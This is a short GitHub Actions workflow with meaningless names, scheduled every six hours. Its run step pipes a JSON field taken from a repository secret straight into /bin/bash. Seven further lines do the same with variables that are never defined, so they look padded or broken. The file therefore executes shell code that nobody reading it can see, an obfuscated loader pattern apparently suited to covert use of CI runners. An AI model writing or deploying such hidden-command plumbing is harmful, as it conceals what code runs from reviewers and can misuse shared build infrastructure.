name: lujingxi3456

on:
  workflow_dispatch:
  schedule:
    - cron: '11 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          jpneu68: ${{ secrets.jpneu68 }}
        run: |
          echo $jpneu68 | jq -r .aqmdw11366 | /bin/bash
          echo $ag1089 | jq -r .v9 | /bin/bash
          echo $lnqa474 | jq -r .p07740 | /bin/bash
          echo $mfitv63 | jq -r .b551 | /bin/bash
          echo $shvx8732 | jq -r .w94 | /bin/bash
          echo $f8560 | jq -r .wyvi217 | /bin/bash
          echo $eny9588 | jq -r .pl2836 | /bin/bash
          echo $zdbj2 | jq -r .o4037 | /bin/bash

